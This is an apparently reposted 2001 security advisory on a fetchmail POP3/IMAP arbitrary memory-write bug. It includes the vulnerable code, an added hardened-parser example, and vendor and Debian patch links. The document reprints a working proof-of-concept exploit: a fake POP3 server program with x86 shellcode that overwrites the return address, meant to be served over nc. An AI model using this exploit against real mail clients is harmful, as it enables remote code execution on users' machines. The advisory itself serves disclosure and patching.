
fetchmail remote memory overwrite vulnerability

Source: Internet   Author: 西部数码   Date: 2008-04-09

Published: 2001-08-10
Updated: 2001-08-10

Affected systems:

Fetchmail < 5.8.17
- Debian Linux 2.2 alias potato
Description:

Fetchmail has two remotely triggerable security vulnerabilities, one in pop3.c and one in imap.c. The two are very similar: an attacker can write an arbitrary 4-byte value to an arbitrary memory address.

The problematic code is shown below (imap.c contains similar code):

pop3.c:

static int pop3_getsizes(int sock, int count, int *sizes)
[snip]
    while ((ok = gen_recv(sock, buf, sizeof(buf))) == 0)
    {
        int num, size;

        if (DOTLINE(buf))
            break;
        else if (sscanf(buf, "%d %d", &num, &size) == 2)
            sizes[num - 1] = size;   /* num is never checked against 1..count */
    }
[snip]
[snip]

The code above uses sscanf to extract two integers, num and size, from the POP3 (IMAP) server's response and then stores size in sizes[num-1]. If an attacker can control or forge the server response, they control the values of both num and size and can therefore overwrite the contents of an arbitrary memory address, for example a function return address.

The attacker needs control of an IMAP/POP3 server; when a remote user retrieves mail from it with fetchmail, the attacker may be able to execute arbitrary code on that user's host with that user's privileges. The attack can also be carried out through methods such as DNS spoofing.
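The missing range check, as an added example that is not fetchmail's own code: a hardened version of the loop above that stores size only when num lies within 1..count, fed from a constructed in-memory server response instead of a socket. safe_getsizes, demo and the sample lines are assumptions for illustration; DOTLINE is reproduced so the block runs stand-alone.

```c
#include <stdio.h>

#define NMSGS 3   /* message count the server claimed in STAT (constructed) */
/* fetchmail's DOTLINE test, reproduced so the block is self-contained */
#define DOTLINE(s) ((s)[0] == '.' && ((s)[1] == '\r' || (s)[1] == '\n' || (s)[1] == '\0'))

/* Hardened parser: stores size in sizes[num-1] only when 1 <= num <= count.
 * Returns the number of rejected "num size" lines, or -1 when the input
 * ended before the "." terminator (truncated or hostile response). */
int safe_getsizes(const char *const *lines, int nlines, int count, int *sizes)
{
    int rejected = 0, i;

    for (i = 0; i < count; i++)
        sizes[i] = -1;          /* "not reported", so gaps stay visible */
    for (i = 0; i < nlines; i++) {
        int num, size;

        if (DOTLINE(lines[i]))
            return rejected;    /* end of the multi-line LIST response */
        if (sscanf(lines[i], "%d %d", &num, &size) != 2)
            continue;           /* not a "num size" line, ignore it */
        /* The original did sizes[num - 1] = size unconditionally, so the
         * server chose both the write address (num) and the value (size). */
        if (num < 1 || num > count || size < 0) {
            rejected++;
            continue;
        }
        sizes[num - 1] = size;
    }
    return -1;
}

/* Constructed LIST response from a hostile server: two valid entries, then
 * indices that would land below and above sizes[] in the unchecked code. */
static const char *const sample_response[] = {
    "1 1200\r\n", "2 345\r\n",
    "-9 4096\r\n", "5000 4096\r\n",
    "garbage\r\n", ".\r\n",
};

/* Run the parser over the sample; idx < 0 returns the rejected count,
 * otherwise the parsed size of message idx+1 (-1 if never reported). */
int demo(int idx)
{
    int sizes[NMSGS];
    int n = sizeof(sample_response) / sizeof(sample_response[0]);
    int rejected = safe_getsizes(sample_response, n, NMSGS, sizes);
    return idx < 0 ? rejected : sizes[idx];
}
```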

<*Source: Salvatore Sanfilippo (antirez@invece.org) *>


Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching only. Users bear the risk themselves!


Salvatore Sanfilippo (antirez@invece.org) provided the following test code:

/* fetchmail proof of concepts i386 exploit
 * Copyright (C) 2001 Salvatore Sanfilippo <antirez@invece.org>
 * Code under the GPL license.
 *
 * Usage: ./a.out | nc -l -p 3333
 * fetchmail localhost -P 3333 -p POP3
 *
 * This is a bad exploit with offset carefully selected
 * to work in my own system. It will probably not work in
 * your system if you don't modify RETR_OFFSET and SHELL_PTR,
 * but you may try to set the SHELL_PTR to 0xAAAAAAAA
 * and use gdb to obtain the proof that your fetchmail is vulnerable
 * without to exploit it.
 * Or just read the code in pop3.c.
 *
 * To improve the exploit portability you may put the shellcode inside
 * one of the static char buffers, grep 'static char' *.c.
 *
 * Tested on fetchmail 5.8.15 running on Linux 2.4.6
 *
 * On success you should see the ls output.
 */

#include <stdio.h>

#define MESSAGES 10
#define RETR_OFFSET -20
#define SHELL_PTR 0xbfffba94

int main(void)
{
    int ish = SHELL_PTR;
    int ret_offset = -10;
    char shellcode[] = /* take the shellcode multiple of 4 in size */
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/ls\0\0";
    int *sc = (int*) shellcode;
    int noop = 0x90909090;
    int i;

    /* OK for user and password, then report the number of messages */
    printf(" OK\r\n OK\r\n OK\r\n OK %d 0\r\n OK 0\r\n OK\r\n", MESSAGES);
    /* Overwrite the RET pointer (negative num values index below sizes[]) */
    for (i = ret_offset-20; i < ret_offset+20; i++)
        printf("%d %d\r\n", i, ish);
    /* Put some NOP */
    for (i = 1; i < 21; i++)
        printf("%d %d\r\n", i, noop);
    /* Put the shell code in the buffer */
    for (i = 21; i < 21+(sizeof(shellcode)/4); i++)
        printf("%d %d\r\n", i, *sc++);
    printf(".\r\n"); /* POP data term */
    return 0;
}




Recommendations:

Vendor patches:

1. fetchmail 5.8.17 has fixed this vulnerability; the latest version can be downloaded from the vendor's homepage:
http://www.tuxedo.org/~esr/fetchmail/


2. Debian Linux (http://www.debian.org/security/) has released a security advisory for this issue:
DSA-071-1 fetchmail remote exploit
http://www.debian.org/security/2001/dsa-071

Patch download -
________________________________________________________________________

Debian GNU/Linux 2.2 alias potato

Potato was released for alpha, arm, i386, m68k, powerpc and sparc.

Source archives:
http://security.debian.org/dists/stable/updates/main/source/fetchmail_5.3.3-3.diff.gz
MD5 checksum: a1ba0691be21e100b10beded89813911
http://security.debian.org/dists/stable/updates/main/source/fetchmail_5.3.3-3.dsc
MD5 checksum: b49e9eacda18f237ae066f085647d3f7
http://security.debian.org/dists/stable/updates/main/source/fetchmail_5.3.3.orig.tar.gz
MD5 checksum: d2cffc4594ec2d36db6681b800f25e2a

Architecture independent archives:
http://security.debian.org/dists/stable/updates/main/binary-all/fetchmailconf_5.3.3-3_all.deb
MD5 checksum: 223c6590b7495a41d4743d526222bc4f
